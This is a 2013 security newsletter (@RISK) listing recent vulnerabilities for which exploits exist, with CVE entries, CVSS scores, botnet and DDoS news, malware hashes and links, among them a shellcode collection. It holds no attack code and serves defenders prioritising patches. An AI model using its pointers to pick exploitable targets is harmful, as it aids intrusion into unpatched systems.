Search

See Resources

@RISK Newsletter for June 06, 2013 The Consensus Security Vulnerability Alert

This is a weekly newsletter that provides in-depth analysis of the latest vulnerabilities with straightforward remediation advice. Qualys supplies a large part of the newly-discovered vulnerability content used in this newsletter.


@RISK: The Consensus Security Vulnerability Alert
Vol. 13, Num. 23

Providing a reliable, weekly summary of newly discovered attack vectors, vulnerabilities with active exploits, and explanations of how recent attacks worked.

Archived issues may be found at https://www.qualys.com/research/sans-at-risk/


CONTENTS:

NOTABLE RECENT SECURITY ISSUES
USEFUL EXPLANATIONS OF HOW NEW ATTACKS WORK
VULNERABILITIES FOR WHICH EXPLOITS ARE AVAILABLE
MOST PREVALENT MALWARE FILES 5/30/13 - 6/4/13


TOP VULNERABILITY THIS WEEK: Google researcher Tavis Ormandy provided

exploit code for an unpatched local kernel vulnerability in Windows this
week, after having first published details on the Full-Disclosure
mailing list in mid-May. The release coincides with Google’s shift from
giving vendors 60 days on actively exploited vulnerabilities to 7 days
before Google will release details.


NOTABLE RECENT SECURITY ISSUES SELECTED BY THE SOURCEFIRE VULNERABILITY RESEARCH TEAM

Title: Google Shifts Policy, Will Release 0-days After A Week; Researcher Provides 0-day PoC
Description: In a major policy announcement made last week, Google
stated that it will publicly disclose details of new vulnerabilities in
other vendors’ products 7 days after discovery, if those issues are
being actively exploited in the wild. This is a major shift from its
previous policy of giving vendors 60 days before disclosure. While
acknowledging that this new policy may be too short of a time frame for
vendors to develop a patch, Google stated that vendors should at least
make users aware of the situation and offer any possible mitigations
while a patch is being developed. Meanwhile, Google researcher Tavis
Ormandy has released exploit code for a local kernel vulnerability in
Windows ahead of a patch by Microsoft, after having released initial
details in mid-May. Microsoft claims that no active exploitation was
taking place prior to the release of the exploit code, although it is
likely that will change in the face of publicly available PoC.
Reference:
http://googleonlinesecurity.blogspot.ch/2013/05/disclosure-timeline-for-vulnerabilities.html
http://seclists.org/fulldisclosure/2013/May/91
http://seclists.org/fulldisclosure/2013/Jun/5
Snort SID: N/A
ClamAV: N/A

Title: RFI Botnet Compromising WordPress, Joomla Sites Worldwide
Description: Researchers at the Deep End Research group released an
in-depth report this week on a major botnet that has been responsible
for compromising hundreds of thousands of WordPress and Joomla web sites
across the planet over the past year. The report, which is designed to
raise awareness among administrators of these notoriously vulnerable web
services, corresponds to attack techniques seen by Sourcefire since
September of 2011. System administrators are urged to check their
systems for signs of compromise by this botnet, and to ensure that their
systems have all of the latest available security patches and
recommended settings applied.
Reference:
http://www.deependresearch.org/2013/05/under-this-rock-vulnerable.html
Snort SID: 26813
ClamAV: Trojan.Dapato-*

Title: Black Revolution DDoS Trojan In The Wild
Description: DDoS continues to be a favorite activity of attackers
worldwide, with recent attacks on financial institutions in particular
reaching 100+ Gbps levels. Researchers at Arbor Networks this week
profiled a particularly advanced DDoS trojan by the name of “Black
Revolution” they have been observing in the wild lately, with different
variants of the malware showing its creators’ progress at evading
detection over time.
Reference:
http://ddos.arbornetworks.com/2013/05/the-revolution-will-be-written-in-delphi/
http://www.prolexic.com/news-events-pr-prolexic-stops-largest-ever-dns-reflection-ddos-attack-167-gbps.html
Snort SID: 26713-26715,26725-26750
ClamAV: Win.Trojan.BlackRev

Title: German Torrent Contains Source For 309 Bots
Description: The authors of the well-respected “Malware Must Die” blog
this week published information on a huge dump of botnet source code
they discovered on a German torrent, which has since been shut down.
While most of the source is several years old, it provides valuable
insight into multiple important families of malware, including Zeus,
Skype-based bots, SDbot, and others. The source code is being shared
with security researchers, and should provide useful information for
network defenders worldwide.
Reference:
http://malwaremustdie.blogspot.com/2013/06/full-disclosure-of-309-botbotnet-source.html?spref=tw
Snort SID: Various
ClamAV: Various


USEFUL EXPLANATIONS OF HOW NEW ATTACKS WORK

Shellcodecs - a huge collection of shellcode, loaders, etc.:
http://www.blackhatlibrary.net/Shellcodecs

Ruby’s $SAFE may go away:
https://bugs.ruby-lang.org/issues/8468

Phishing as a service:
http://blog.thinkst.com/2013/06/phish-your-company-before-someone-else.html

Cisco in the sky with diamonds:
http://securityops.wordpress.com/2013/06/01/http_exec-automated-vt-analysis-of-downloaded-executable-files/

How to search encrypted text in SQL server 2005/2008:
http://geekswithblogs.net/chrisfalter/archive/2008/10/06/how-to-search-encrypted-text.aspx

Trawling for Tor hidden services - detection, measurement, deanonymization:
http://www.ieee-security.org/TC/SP2013/papers/4977a080.pdf

Microsoft releases new mitigation guidance for Active Directory:
http://blogs.technet.com/b/security/archive/2013/06/03/microsoft-releases-new-mitigation-guidance-for-active-directory.aspx

NSA official mitigations for DDoS:
http://info.publicintelligence.net/NSA-IAD-DDoS.pdf


RECENT VULNERABILITIES FOR WHICH EXPLOITS ARE AVAILABLE COMPILED BY THE QUALYS VULNERABILITY RESEARCH TEAM

This is a list of recent vulnerabilities for which exploits are
available. System administrators can use this list to help in
prioritization of their remediation activities. The Qualys Vulnerability
Research Team compiles this information based on various exploit
frameworks, exploit databases, exploit kits and monitoring of internet
activity.

ID: CVE-2012-5946
Title: IBM SPSS SamplePower C1Tab ActiveX Heap Overflow
Vendor: IBM
Description: Buffer overflow in the c1sizer ActiveX control in
C1sizer.ocx in IBM SPSS SamplePower 3.0 before FP1 allows remote
attackers to execute arbitrary code via a long TabCaption string.
CVSS v2 Base Score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)

ID: CVE-2013-2028
Title: Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow
Vendor: nginx.org
Description: Remote exploitation of an integer overflow vulnerability
in version 1.4.0 of nginx, as included in various vendors’ operating
system distributions, could allow attackers to execute arbitrary code
on the targeted host.
CVSS v2 Base Score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)

ID: CVE-2013-1347
Title: Microsoft Internet Explorer 8 Use-After-Free Memory Corruption Vulnerability
Vendor: Microsoft
Description: Microsoft Internet Explorer 8 does not properly handle
objects in memory, which allows remote attackers to execute arbitrary
code by accessing an object that (1) was not properly allocated or (2)
is deleted, as exploited in the wild in May 2013.
CVSS v2 Base Score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)

ID: CVE-2013-3336
Title: Adobe ColdFusion Information Disclosure Vulnerability (APSB13-13)
Vendor: Adobe
Description: Unspecified vulnerability in Adobe ColdFusion 9.0, 9.0.1,
9.0.2, and 10 allows remote attackers to read arbitrary files via
unknown vectors.
CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)

ID: CVE-2013-2423
Title: Java Applet Reflection Type Confusion Remote Code Execution
Vendor: Oracle
Description: Unspecified vulnerability in the Java Runtime Environment
(JRE) component in Oracle Java SE 7 Update 17 and earlier, and OpenJDK
7, allows remote attackers to affect integrity via unknown vectors
related to HotSpot. NOTE: the previous information is from the April
2013 CPU. Oracle has not commented on claims from the original
researcher that this vulnerability allows remote attackers to bypass
permission checks by the MethodHandles method and modify arbitrary
public final fields using reflection and type confusion, as demonstrated
using integer and double fields to disable the security manager.
CVSS v2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)

ID: CVE-2013-1493
Title: Oracle Java SE JVM 2D Subcomponent Remote Code Execution
Vulnerability (Oracle Security Alert for CVE-2013-1493)
Vendor: Oracle
Description: The color management (CMM) functionality in the 2D
component in Oracle Java SE 7 Update 15 and earlier, 6 Update 41 and
earlier, and 5.0 Update 40 and earlier allows remote attackers to
execute arbitrary code or cause a denial of service (crash) via an image
with crafted raster parameters, which triggers (1) an out-of-bounds read
or (2) memory corruption in the JVM, as exploited in the wild in
February 2013.
CVSS v2 Base Score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)


MOST PREVALENT MALWARE FILES 5/30/13 - 6/4/13 COMPILED BY SOURCEFIRE

SHA 256: 94A1A26F61B015C2CED2FD50BDBA4070B6C9AEC7D2938FBF7EB9E99960D3B7A9
MD5: bfacf78644ca41fd6d4b23976e7574a1
VirusTotal: https://www.virustotal.com/file/94A1A26F61B015C2CED2FD50BDBA4070B6C9AEC7D2938FBF7EB9E99960D3B7A9/analysis/

Typical Filename: RemoveWAT.exe
Claimed Product: RemoveWAT.exe
Claimed Publisher: RemoveWAT.exe

SHA 256: AA0BBAECB678868E1E7F57C7CA9D61B608B3D788BE490790EB1D148BEADF4615
MD5: 3291e1603715c47a23b60a8bf2ca73db
VirusTotal: https://www.virustotal.com/file/AA0BBAECB678868E1E7F57C7CA9D61B608B3D788BE490790EB1D148BEADF4615/analysis/

Typical Filename: 01.tmp
Claimed Product: 01.tmp
Claimed Publisher: 01.tmp

SHA 256: 7BB7125EC5ECF99F975D7CB127009E615847D3FF05FA9F2F79F92CB480B28DC5
MD5: 2f0550df2d7e60752765b44aeb772091
VirusTotal: https://www.virustotal.com/file/7BB7125EC5ECF99F975D7CB127009E615847D3FF05FA9F2F79F92CB480B28DC5/analysis/

Typical Filename: pricepeep_130001_0101.exe
Claimed Product: pricepeep_130001_0101.exe
Claimed Publisher: pricepeep_130001_0101.exe

SHA 256: A6B140EC734C258C5EBF19C0BC0B414B5655ADC00108A038B5BE6A8F83D0BD03
MD5: 8ac1e580cf274b3ca98124580e790706
VirusTotal: https://www.virustotal.com/file/A6B140EC734C258C5EBF19C0BC0B414B5655ADC00108A038B5BE6A8F83D0BD03/analysis/

Typical Filename: Virus.Win32.Sality.ab
Claimed Product: Virus.Win32.Sality.ab
Claimed Publisher: Virus.Win32.Sality.ab

SHA 256: DF83A0D6940600E4C4954F4874FCD4DD73E781E6690C3BF56F51C95285484A3C
MD5: 25aa9bb549ecc7bb6100f8d179452508
VirusTotal: https://www.virustotal.com/file/DF83A0D6940600E4C4954F4874FCD4DD73E781E6690C3BF56F51C95285484A3C/analysis/

Typical Filename: ygrqpx.exe
Claimed Product: ygrqpx.exe
Claimed Publisher: ygrqpx.exe


Email or call us at +1 800 745 4355 or try our Global Contacts
Subscription Packages
Qualys Solutions
Qualys Community
Company
Free Trial & Tools
Popular Topics